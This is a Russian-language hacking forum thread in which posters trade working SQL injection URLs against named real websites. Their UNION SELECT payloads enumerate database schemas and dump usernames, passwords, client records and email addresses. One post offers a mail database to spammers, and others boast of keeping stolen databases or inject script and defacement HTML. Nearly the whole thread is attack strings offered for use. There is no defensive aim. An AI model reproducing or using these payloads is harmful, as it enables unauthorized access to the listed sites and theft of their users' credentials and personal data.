SQL Инъекции

Code:

http://www.togather.biz/showcg.php?id=-4+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),5,6,7,8,9,10,11/*

 

когда будете пробиваться дальше, не убирайте переменные после начала комментария, на сайте видимо стоит какой то скрипт, который проверяет правильность строки, если убрать не нужные переменные - выкидывает на индекс =\

 

Спамерам база мыл

Code:

http://www.timegifts.ru/index.php?description=-1'+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(email_user,0x3a,password),0x75),0x75)+from+us

 

Скобку после -99 тоже не убираем =)

 

Code:

http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11,12,13,14,15/*
http://www.democracy.ru/print.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+242,1/*

http://www.democracy.ru/print.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+25,1/*
http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat(table_schema,char(58),column_name),4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=char(99,108,105,101,110,116,115)+limit+0,1/*
http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat(clientID,char(58),clientname,char(58),contact,char(58),email,char(58),views,char(58),clicks,char(58),clientusername,char(58),clientpassword,char(58),expire),4,5,6,7,8,9,10,11,12,13,14,15+from+iesd.clients+limit+0,1/*

http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat(username,char(58),user_password),4,5,6,7,8,9,10,11,12,13,14,15+from+iesd.phpbb_users+limit+1,1/*

 

=))))

 

[offtop] я это выкладывал страниц 20 назад [/offtop]

 

0_о
***** >www.timegifts.ru Не хо покопаться,там говорят скуль есть
bxN5 > Могу ,а нах*й тебе?
*****> Там говорят база мыл хорошая
Не видел,мне вообще эта ветка не нравится

 

было, было) у меня база на харде)

ps: piro.ru шоп

Code:

http://www.piro.ru/show_katalog.php?id=-1+union+select+1,2,concat(login,0x3a,password)+from+users/*

мб было, не помню..
база логины:пассы в откр. виде

 

не могу ниче подобрать

 

2edos
аффигительная скуля))

там и подбирать ничего неандо))

 

может байан
ЗЫ Превед Ксандер =)

VampiRUS, скуля жесть, include() рулит =)

 

http://www.jerusalemsummit.org/eng/news.php?news=-102+union+select+1,2,3,User(),4,5,version(),7,9,database()/*

 

SQL - Injection

 

http://www.4cio.ru/main.php?mname=160&number=-1+union+select+0x3c7363726970743e616c6572742827444956455227293c2f7363726970743e+from+mysql.user+limit+0,1/*

 

Code:

http://www.maptun.com/webshop/shop.php?rubrik=25+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,5,56,57,58,59,60,61,62--


http://www.maptun.com/news.php?id=-104+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--


http://www.maptun.com/cars.php?id=-57+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,version(),19,database(),TABLE_NAME,22,23,24,25,26,27,28,29,30+from+INFORMATION_SCHEMA.TABLES+limit+32,1-

Code:

http://www.afcwimbledon.co.uk/shop/shop.php?deptid=1+and+1--  
http://www.afcwimbledon.co.uk/shop/shop.php?subid=2&itemid=951+and+version()%3C4

 

=\
update

 

http://www.ibercork.ru/news.php?id=-1+union+select+1,0x3c68313ed8ebffefe020eae0eae0fff2ee20283c2f68313e,111/*

 

@_@
update

 

http://www.promtractor.ru/products_show.php?section=9&id=75+union+select+1,2,3,4,5,6,7,8,9,0/*